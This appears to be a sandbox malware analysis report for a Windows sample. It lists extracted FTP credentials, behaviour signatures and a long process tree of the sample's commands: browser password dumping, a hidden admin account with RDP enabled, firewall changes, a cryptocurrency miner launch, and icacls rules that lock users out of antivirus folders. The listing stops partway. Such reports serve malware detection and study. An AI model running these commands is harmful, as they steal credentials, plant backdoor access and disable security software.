Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
19-06-2024 07:13
General
-
Target
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
-
Size
17.0MB
-
MD5
bd38e93c22ab359d615e7464fd252363
-
SHA1
a2100f45c63843df24fc95f0179851399951f9d7
-
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
-
SHA512
014c37ff5b55569a62db9be82df29102b1cb1e8ced11d25b3aedbf79dff2be9ddd3f577d1781a68b84ae39a62be1d99b156965c17c052315e67f43e0c9486cd1
-
SSDEEP
393216:iYp4jGXCrXu7RJuDZEIjUYmq1HmcopWtmeUb969RooKtN:HpnXDRAhocm4tLA9eRGN
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
194.67.198.139 - Port:
21 - Username:
alex - Password:
easypassword
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs 5 IoCs
-
Windows security bypass 2 TTPs 1 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 1 IoCs
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 1 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible privilege escalation attempt 64 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
ASPack v2.12-2.42 1 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 42 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
-
Modifies WinLogon 2 TTPs 7 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 8 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
-
Drops file in Program Files directory 22 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 15 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 5 IoCs
-
Modifies registry class 3 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 6 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 16 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 7 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\Logs.exeC:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Microsoft\Intel\L.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\ProgramData\Microsoft\Intel\winit.exeC:\ProgramData\Microsoft\Intel\winit.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Windows\install.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"5⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
-
-
C:\Programdata\Windows\winit.exe"C:\Programdata\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\Cheat.exeC:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\programdata\microsoft\intel\svchost.exe"C:\programdata\microsoft\intel\svchost.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\programdata\microsoft\rootsystem\P.exe"C:\programdata\microsoft\rootsystem\P.exe"5⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt6⤵
- Loads dropped DLL
-
C:\programdata\microsoft\rootsystem\1.exeC:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\pause.bat" "6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\bat.bat" "8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
- Hide Artifacts: Hidden Users
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\users\john"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\programdata\microsoft\intel\winlogon.exe"C:\programdata\microsoft\intel\winlogon.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\342A.tmp\342B.bat C:\programdata\microsoft\intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\Vega.exeC:\ProgramData\Microsoft\Intel\Vega.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exeC:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p1235⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\programdata\microsoft\intel\Vegas.exe"C:\programdata\microsoft\intel\Vegas.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\3FB0.bat C:\programdata\microsoft\intel\Vegas.exe"7⤵
-
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\systemreset.exe8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\systemreset.exe /setowner Admin8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F8⤵
- Modifies file permissions
-
-
-
-
-
-
C:\programdata\microsoft\intel\MOS.exeC:\programdata\microsoft\intel\MOS.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"5⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Microsoft\Intel\OS.bat" "6⤵
- Loads dropped DLL
-
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 18⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe8⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns10⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force9⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force10⤵
-
-
-
C:\ProgramData\WindowsTask\AppHost.exeC:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t49⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc stop swprv3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config swprv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config swprv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc stop crmsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\olly.exe /deny Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\Iostream.exe /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
